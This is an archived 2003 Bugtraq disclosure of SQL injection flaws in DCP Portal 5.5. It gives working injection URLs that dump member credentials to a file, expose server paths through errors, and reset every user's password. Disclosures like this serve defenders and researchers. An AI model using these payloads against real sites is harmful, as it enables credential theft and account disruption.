[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

DCP Portal - 5.5 holes

To: bugtraq@securityfocus.com
Subject: DCP Portal - 5.5 holes
From: Lifo Fifo <lifofifo20@yahoo.com>
Date: 1 Oct 2003 12:08:25 -0000


Never use this product if you have turned off magic_quotes_gpc. And this 
product won't work anyway if you have turned off register_globals.

All the files in the product, dont check for integrity of variables. You can 
easily exploit this using some SQL Injection techniques. For example, if you 
want to get username/password of all the users, you can exploit advertiser.php. 

Open it like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 
1=1 UNION select uid,name,password,surname,job,email from dcp5_members into 
outfile 'c:/apache2/htdocs/dcpad.txt

This is for windows, if web-server is running on *nix, then you could enter 
something like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 
1=1 UNION select uid,name,password,surname,job,email from dcp5_members into 
outfile '/var/www/html/dcpad.txt

In this cases, you will need to enter the absolute path. For that, run the 
follwing

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=' and that 
will show the path to the sever if they have turned on display_errors in 
php.ini.

That's all ! Notice that here we are using UNION function in query. For that, 
the host should be running version MySQL 4.x. Well, if it's not running 4.x, No 
problem, we have another file !

This time it's lostpassword.php.

Open it like,

http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'

This will really cause some damage. It will reset password of everyone. 
Everyone will get as many mails as the number of users. And evryone's password 
will be the one provided in the last email.

I didn't have time to check if there was injection possible with some numeric 
field. If it's there, one can launch select-fish attacks, which would work even 
in case of magic_quotes_gpc is on.

Fix : Insteading of fixing it, simply turn on magic_quotes_gpc. Otherwise it 
will take you as much time as they took in making DCP Portal.

-lifofifo
http://www.hackingzone.org/

Prev by Date: Cisco Security Advisory: SSL Implementation Vulnerabilities
Next by Date: Re: Local stackbased overflow found for silly Poker v0.25.5 (advisory + poc exploit)
Previous by thread: Cisco Security Advisory: SSL Implementation Vulnerabilities
Next by thread: SuSE Security Announcement: openssl (SuSE-SA:2003:043)
Index(es):
- Date
- Thread